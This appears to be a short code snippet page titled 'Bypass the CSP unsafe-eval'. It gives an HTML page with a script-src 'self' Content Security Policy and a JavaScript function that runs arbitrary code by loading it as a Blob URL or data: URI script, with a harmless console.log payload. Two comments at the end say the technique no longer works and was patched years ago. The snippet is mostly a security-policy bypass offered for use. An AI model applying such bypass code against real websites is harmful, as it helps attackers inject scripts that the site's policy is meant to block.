Bypass the CSP "unsafe-eval"

bypass.csp.html

<!DOCTYPE html>
<html>
    <head>
        <meta content="script-src 'self';" http-equiv="Content-Security-Policy">
        <script type="text/javascript" src="csp.js"></script>
    </head>
</html>

csp.js

function cspEval(js) {
    var script = document.createElement("script")

    // No Blob ? No CSP !
    if(Blob) {
        var blob = new Blob([js], {"type": "application/javascript"})
        script.src = URL.createObjectURL(blob)
    } else {
        var dataUri = "data:application/javascript," + js
        script.src = dataUri
    }

    var callback = function() { document.body.appendChild(script) }
    document.readyState === "complete" ? callback() : window.onload = callback

}

cspEval("console.log('Bypass CSP unsafe-eval')")

doesnt even work in github.com lol

patched for several years... look at the date of the last revision 🤣